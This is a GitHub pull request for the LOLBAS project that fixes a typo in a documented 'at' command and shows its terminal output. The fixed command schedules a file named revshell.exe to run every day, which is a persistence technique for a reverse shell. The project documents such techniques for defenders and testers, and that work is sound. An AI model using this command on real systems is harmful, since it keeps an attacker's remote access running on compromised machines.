Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remove unnecessary "at" on command #286

Merged
merged 1 commit into from
May 1, 2023
Merged

Conversation

b1scoito
Copy link
Contributor

@b1scoito b1scoito commented Apr 13, 2023

Removes unnecessary "at" on the command line that breaks the execution of the command itself.

With:

PS C:\Windows\system32 at at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
The AT command has been deprecated. Please use schtasks.exe instead.

Invalid command.

Without:

PS C:\Windows\system32> at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
The AT command has been deprecated. Please use schtasks.exe instead.

Warning: Due to security enhancements, this task will run at the time
expected but not interactively.
Use schtasks.exe utility if interactive task is required ('schtasks /?'
for details).
Added a new job with job ID = 1

Copy link
Member

@wietze wietze left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Good spot, thank you!

@wietze wietze merged commit 1f7e8a3 into LOLBAS-Project:master May 1, 2023
1 check passed
C-h4ck-0 added a commit to C-h4ck-0/LOLBAS that referenced this pull request May 7, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants